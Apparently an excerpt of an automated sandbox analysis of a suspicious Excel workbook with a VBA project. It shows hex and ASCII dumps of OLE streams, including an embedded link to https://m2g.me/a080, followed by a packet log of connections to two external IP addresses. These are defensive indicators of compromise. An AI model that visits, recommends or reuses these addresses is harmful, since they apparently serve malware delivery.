                                                                                                                                                                                      Data ASCII:. . . . K ~ . ! . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . m . 2 . g . . . m . e . / . a . 0 . 8 . 0 . . . P i t . . 1 . ! 6 E . & . ` . ) o . + . f O . h % ; . m j _ . . . M L q r . . . 5 / | P ] . . O T . X 1 I . . . % . ( ` > . ) > B X : . . . . . . . . . . . . . . . . . . . a . T . E . K . z . M . V . W . H . 1 . E . 5 . L . n . N . y . C . T . Z . O . K . C . R . 4 . g . X . G . S . P . w . A . k . 5 . I . k . 6 . 8 . 0 . A . m . Q . a . H . 1 . D . I . c . L . 7
                                                                                                                                                                                      Data Raw:01 00 00 02 4b f0 9a 7e 16 21 80 1a 00 00 00 00 00 00 00 00 00 00 00 00 ba 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b b6 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6d 00 32 00 67 00 2e 00 6d 00 65 00 2f 00 61 00 30 00 38 00 30 00 00 00 ea df fc 50 f2 69 f1 d1 74 ea eb 0e ab cf b6 da c4 e2 31 0d 21 93 8e c0 94 36 96 93 aa 45 e4 e4 df 99 26 1d e2 b6 60 e5
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                      Stream Size:339335
                                                                                                                                                                                      Entropy:7.998729325152868
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . m g } G . T . u . t t g b t W | t . D . . . . . . . . t . . . \\ . p . . P p 2 Q . b d * 4 v W J $ } . G . D v . o a m / k | . ' H } r = o t D Z ) ] R { a . . . . B ; K . a . @ . . . y ` < p . a 8 B . . . C . a . . . . . . = . . . I ! U . . . q . . 4 . P . 0 . . . r . . . . . . . . k . . . . N . . . . . . . . v = . . . N . 5 A . . u . z e @ . . . & . . . . H ! " . . . . . . . . K . . . B . . . K 1 . . . . v . . . U M } Z . { 8 ^ l 1 . . . V ~ ~ ? & , .
                                                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 6d b5 94 e1 f6 67 7d 47 d0 9e 54 16 c1 75 ed 0a 74 74 ac cc f2 67 cd ed f4 96 bd 9d 62 f0 dd 74 57 e0 c3 c4 fc a8 bc 7c 74 ec 83 89 b6 8d 44 a9 e1 00 02 00 b0 04 c1 00 02 00 1f 74 e2 00 00 00 5c 00 70 00 da 1b 50 93 fc 80 70 b4 32 f6 8e 51 0d 62 64 fa 2a 34 85 de 76 57 91 4a 24 f9 f7 90 7d df
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Stream Size:525
                                                                                                                                                                                      Entropy:5.274238839895712
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:I D = " { 4 7 6 C 6 B 8 9 - B 1 3 B - 4 5 2 A - B 4 7 9 - 5 2 4 7 8 0 3 A B E 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 9 5 B 9 E 2 6 A 2 2 6 A 2 2 6 A
                                                                                                                                                                                      Data Raw:49 44 3d 22 7b 34 37 36 43 36 42 38 39 2d 42 31 33 42 2d 34 35 32 41 2d 42 34 37 39 2d 35 32 34 37 38 30 33 41 42 45 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:104
                                                                                                                                                                                      Entropy:3.0488640812019017
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:2644
                                                                                                                                                                                      Entropy:3.9937045515448166
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:553
                                                                                                                                                                                      Entropy:6.366265508038255
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                                                                                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 0e 80 15 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Oct 7, 2024 07:14:30.564963102 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:30.565057039 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:30.565150023 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:30.570532084 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:30.570568085 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:31.537511110 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:31.537775993 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:31.543982029 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:31.544012070 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:31.544502020 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:31.544570923 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:31.620659113 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:31.663470030 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:32.166131973 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:32.166223049 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:32.166354895 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:32.166354895 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:32.168123960 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:32.168173075 CEST4434916114.194.50.211192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:32.168204069 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:32.168251038 CEST49161443192.168.2.2214.194.50.211
                                                                                                                                                                                      Oct 7, 2024 07:14:32.181694031 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:32.186572075 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:32.186660051 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:32.186718941 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:32.191499949 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031301022 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031332016 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031348944 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031368017 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031438112 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031455040 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031470060 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031513929 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031513929 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031513929 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031513929 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031513929 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031537056 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031553984 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031563044 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031569004 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031574011 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031586885 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031603098 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036525965 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036551952 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036570072 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036583900 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036611080 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036640882 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.038237095 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.232968092 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233000994 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233017921 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233032942 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233041048 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233050108 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233066082 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233066082 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233067036 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233083010 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233098030 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233110905 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233149052 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233215094 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233259916 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233285904 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233302116 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233326912 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233345985 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233406067 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233421087 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233447075 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233558893 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233586073 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.233593941 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234105110 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234139919 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234165907 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234181881 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234200001 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234210968 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234306097 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234343052 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234359026 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234368086 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234384060 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.234399080 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.235006094 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.235050917 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.235097885 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.235112906 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.235136986 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.235146046 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.382016897 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434581041 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434602976 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434621096 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434639931 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434655905 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434669018 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434669971 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434689045 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434705973 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434708118 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434721947 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434736013 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434837103 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434854031 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434876919 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.434889078 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435478926 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435523033 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435570002 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435586929 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435612917 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435625076 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435695887 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435712099 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435739040 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435753107 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435760975 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435822010 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.435837030 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436444998 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436475992 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436491013 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436491966 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436503887 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436520100 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436624050 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436640024 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436655998 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436671019 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436674118 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436696053 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.436706066 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437401056 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437454939 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437475920 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437491894 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437520027 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437603951 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437619925 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437637091 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437645912 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437655926 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437659979 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437675953 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.437689066 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438395977 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438441992 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438456059 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438472033 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438491106 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438509941 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438601971 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438616991 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438632965 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438651085 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438654900 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438671112 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.438685894 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.439369917 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.439402103 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.439419031 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.439445972 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.521631002 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.521760941 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.635880947 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.635917902 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.635934114 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.635956049 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.635982037 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636029005 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636044979 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636060953 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636069059 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636077881 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636096001 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636122942 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636199951 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636240959 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636266947 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636282921 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636353016 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636415958 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636430979 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636430979 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636446953 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636462927 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636466026 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636477947 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636507988 CEST4916280192.168.2.2238.240.41.28
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636626959 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636641979 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636657000 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636674881 CEST804916238.240.41.28192.168.2.22
                                                                                                                                                                                      Oct 7, 2024 07:14:33.636676073 CEST4916280192.168.2.2238.240.41.28
